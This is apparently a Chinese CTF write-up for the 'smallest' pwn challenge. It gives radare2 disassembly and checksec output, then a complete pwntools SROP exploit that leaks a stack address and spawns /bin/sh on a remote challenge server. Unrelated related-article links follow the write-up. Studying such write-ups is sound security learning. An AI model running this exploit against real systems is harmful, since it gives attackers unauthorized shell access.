以前一直只是大概看过这种技术,没实践过,今天刚好遇到一道题,实践了一波,确实很方便

unmoxiao@cat ~/s/pd_ubuntu> r2 -A smallest                                                                             00:54:15

Warning: Cannot initialize dynamic strings

[x] Analyze all flags starting with sym. and entry0 (aa)

[x] Analyze len bytes of instructions for references (aar)

[x] Analyze function calls (aac)

[ ] [*] Use -AA or aaaa to perform additional experimental analysis.

[x] Constructing a function name for fcn.* and sym.func.* functions (aan))

0x004000b0

 -- WASTED

[0x004000b0]> afl

0x004000b0    1 17           entry0

[0x004000b0]> pdf entry0

            ;-- section..text:

/ (fcn) entry0 17

|   entry0 ();

|           0x004000b0      4831c0         xor rax, rax                ; section 1 va=0x004000b0 pa=0x000000b0 sz=17 vsz=17 rwx=--r-x .text

|           0x004000b3      ba00040000     mov edx, 0x400              ; 1024

|           0x004000b8      4889e6         mov rsi, rsp

|           0x004000bb      4889c7         mov rdi, rax

|           0x004000be      0f05           syscall

\           0x004000c0      c3             ret

[0x004000b0]>

源码就这么几行,

junmoxiao@cat ~/s/pd_ubuntu> file smallest                                                                              00:54:06

smallest: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped

junmoxiao@cat ~/s/pd_ubuntu> checksec smallest                                                                          00:54:12

[*] '/Users/junmoxiao/share/pd_ubuntu/smallest'

    Arch:     amd64-64-little

    RELRO:    No RELRO

    Stack:    No canary found

    NX:       NX enabled

    PIE:      No PIE (0x400000)

junmoxiao@cat ~/s/pd_ubuntu>

最后的exp

#coding:utf-8

from pwn import *

import time

file_name = './smallest'

context.binary = file_name

elf = ELF(file_name)

#context.log_level = 'debug'

syscall_addr = 0x4000be

#p = process(file_name)

p = remote('106.75.93.227', 20000)

#p = remote('106.75.61.55',  20000)

#gdb.attach(p, 'aslr on;b * 0x4000b0')

# ---------------------------------------------------------------------------------

log.info('call read; call write; call read')

payload = p64(0x4000b0)

payload += p64(0x4000b3)

payload += p64(0x4000b0)

p.sendline(payload)

time.sleep(3)

p.send('\xb3')

# -------------------------------------------------------------------------------------

# set eax; sigreturn;

leak_data = p.recvn(0x400)

leak_addr = u64(leak_data[0x8:0x8+8])

print "leak_addr: %s" % hex(leak_addr)

stack_addr = leak_addr - 0x1000

print 'stack_start_addr %s' % hex(stack_addr)

binsh_addr = stack_addr + 0x300

print 'binsh_addr: %s' % hex(binsh_addr)

log.info('stack pivot to %s' % hex(stack_addr))

frame = SigreturnFrame()

frame.rax = constants.SYS_read

frame.rdi = 0

frame.rsi = stack_addr

frame.rdx = 0x500

frame.rsp = stack_addr

frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)

payload += str(frame)

p.sendline(payload)

time.sleep(10)

p.send(payload[8:8+15]) # set eax=sigreturn

time.sleep(5)

log.info('execve')

frame = SigreturnFrame()

frame.rax = constants.SYS_execve

frame.rdi = binsh_addr

frame.rsi = 0

frame.rdx = 0

frame.rsp = 0x400300

frame.rip = syscall_addr

payload =  p64(0x4000b0) + p64(syscall_addr)

payload += str(frame)

payload += 'a' * (0x300-len(payload)) + '/bin/sh\x00'

p.sendline(payload)

time.sleep(5)

p.send(payload[8:8+15]) # set eax=sigreturn

p.interactive()

SROP的一个实例的更多相关文章

  1. C#[Win32&WinCE&WM]应用程序只能运行一个实例:MutexHelper

    前言 在开发应用程序时,通常只让程序运行一个实例.所以,就要判断程序是否已经运行. 下面是我自己在项目中使用到,封装好的帮助类.有 普通的 C# 应用程序 和 Windows CE 和 Windows ...

  2. 转 C# 只允许运行一个实例

    来源:http://blog.csdn.net/jin20000/article/details/3136791 互斥进程(程序), 简单点说,就是在系统中只能有该程序的一个实例运行. 现在很多软件都 ...

  3. C# 只启动一个实例完全解决方案

    工作上经常会遇到"程序只能启动一个实例"这样的需求. 我想,这样的需求应该很普遍,所以没打算去动脑筋,去找谷歌问下就得了,用下来发现,不是这里不爽就是那里不行. 先说下我详细的几点 ...

  4. ArcGIS API for JavaScript开发环境搭建及第一个实例demo

    原文:ArcGIS API for JavaScript开发环境搭建及第一个实例demo ESRI公司截止到目前已经发布了最新的ArcGIS Server for JavaScript API v3. ...

  5. Sqlserver Sql Agent Job 只能同时有一个实例运行

    Sqlserver Sql Agent中的Job默认情况下只能有一个实例在运行,也就是说假如你的Sql Agent里面有一个正在运行的Job叫"Test Job",如果你现在再去启 ...

  6. c# 只允许一个实例运行

    1.单件模式,Singleton,应用程序只能允许一个实例在运行.这是最好的解决方法2.查询系统进程里是不是已经运行.private void Form1_Load(object sender, Ev ...

  7. Python使用MySQL数据库的方法以及一个实例

    使用环境:Windows+python3.4+MySQL5.5+Navicat 一.创建连接 1.准备工作,想要使用Python操作MySQL,首先需要安装MySQL-Python的包,在Python ...

  8. Linux编程之《只运行一个实例》

    概述 有些时候,我们要求一个程序在系统中只能启动一个实例.比如,Windows自带的播放软件Windows Medea Player在Windows里就只能启动一个实例.原因很简单,如果同时启动几个实 ...

  9. Qt之运行一个实例进程

    简述 发布程序的时候,我们往往会遇到这种情况: 只需要用户运行一个实例进程 用户可以同时运行多个实例进程 一个实例进程的软件有很多,例如:360.酷狗- 多个实例进程的软件也很多,例如:Visual ...

随机推荐

  1. 让你如绅士般基于描述编写 Python 命令行工具的开源项目:docopt

    作者:HelloGitHub-Prodesire HelloGitHub 的<讲解开源项目>系列,项目地址:https://github.com/HelloGitHub-Team/Arti ...

  2. 【原创】go语言学习(二)数据类型、变量量、常量量

    目录 1.标识符.关键字2. 变量量和常量量3. 数据类型4. Go程序基本结构 标识符.关键字 1.标识符是⽤用来表示Go中的变量量名或者函数名,以字⺟母或_开头.后⾯面跟着字⺟母 ._或数字2. ...

  3. 一致性哈希(PHP核心技术与最佳实践)

    <?php /** * 分布式缓存部署方案 * 当有1台cache服务器不能满足我们的需求,我们需要布置多台来做分布式服务器,但是 * 有个问题,怎么确定一个数据应该保存到哪台服务器上呢? * ...

  4. CSS实现带箭头的提示框

    我们在很多UI框架中看到带箭头的提示框,感觉挺漂亮,但是之前一直不知道其原理,今天网上找了些资料算是弄清楚原理了: 先上效果图: 原理分析: 上面的箭头有没有觉得很像一个三角形,是的,它就是三角形:只 ...

  5. DOM操作方法、属性

    话不多说直接上demo: <!DOCTYPE html> <html lang="en"> <head> <meta charset=&q ...

  6. 【DP合集】背包 bound

    N 种物品,第 i 种物品有 s i 个,单个重量为 w i ,单个价值为 v i .现有一个限重为 W 的背包,求能容 纳的物品的最大总价值. Input 输入第一行二个整数 N , W ( N ≤ ...

  7. 模拟telnet协议C语言客户端程序

    首先要了解telnet协议,一下两篇blog给了我初步的思路 https://www.cnblogs.com/liang-ling/p/5833489.html 这篇有比较基础的介绍 以及IAC命令含 ...

  8. 《java编程思想》P125-P140(第七章复用类部分)

    1.类的成员默认的是包访问权限.允许包内成员访问 2.super.scrub() 调用基类的scrub方法 3.继承并不是复制基类的接口.当创建了一个导出类(子类)对象时,该对象包含了一个基类的子对象 ...

  9. Linux之常用命令II

    一.VI编辑器 1) 概述 ◆  Visual Interface(可视化接口): ◆  类似Windows中的记事本,比记事本强大: ◆  VIM相对于VI做了哪些提升 -VIM支持多级撤销 -VI ...

  10. splinter操作ie浏览器

    splinter 是在selenium上的封装,很多操作更方便,但是默认似乎不能直接操作ie,通过修改browser.py文件,splinter\driver\webdriver下增加ie.py文件, ...